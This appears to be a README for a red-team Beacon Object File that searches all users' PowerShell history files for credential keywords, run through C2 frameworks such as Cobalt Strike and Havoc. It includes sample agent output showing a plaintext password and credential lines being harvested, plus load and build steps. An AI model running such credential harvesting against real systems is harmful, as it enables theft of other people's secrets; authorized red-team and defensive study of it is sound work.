enumpwshhist is a Beacon Object File (BOF) that enumerates and finds sensitive information in PowerShell history files. This attempts to access the PowerShell history file directory of all users and will grep lines for a number of pre-defined keywords.
The behaviour is the same as the Powershell History netexec SMB Module except you can now run it from your favorite C2 or BOF runner.
enumpwshhist: enumERATE pOwERshELL histORY
enumpwshhist
22/01/2025 15:56:46 [danielward] Demon » enumpwshhist
[*] [5E924F7B] Enumerating powershell history for all reachable directories
[+] Send Task to Agent [31 bytes]
[+] Received Output [42 bytes]:
[+] Enumerating powershell history files!
[+] Received Output [736 bytes]:
Evaluating directory: C:\Users\lo\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
File found: ConsoleHost_history.txt
Full path: C:\Users\lo\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Sensitive keywords found:
[convertto-securestring] $creds = convertto-securestring 'helloworld123' -asplaintext -force
[credential] $uo = new-object system.manageement.automation.pscredential ('micael.jackson', $creds)
[credential] $uo = new-object system.manageement.automation.pscredential ('michael.jackson', $creds)
[credential] $uo = new-object system.management.automation.pscredential ('michael.jackson', $creds)
[convertto-securestring] $creds = convertto-securestring 'h123elloworld123' -asplaintext -force
[+] Received Output [42 bytes]:
[+] Finished powershell file enumeration!
[*] BOF execution completed
- CobaltStrike : load
enumpwshhist.cna - Havoc : load
havoc-enumpwshhist.py
The makefile is setup for cross platform compilation using mingw:
make
- netexec's powershell history module, which this BOF is based on
- wsummerhill's enumfiles BOF which has a powershell history module which lists powershell history files. However, only works for the current user only and requires the
APPDATAenvironment variable to be set which is not always the case.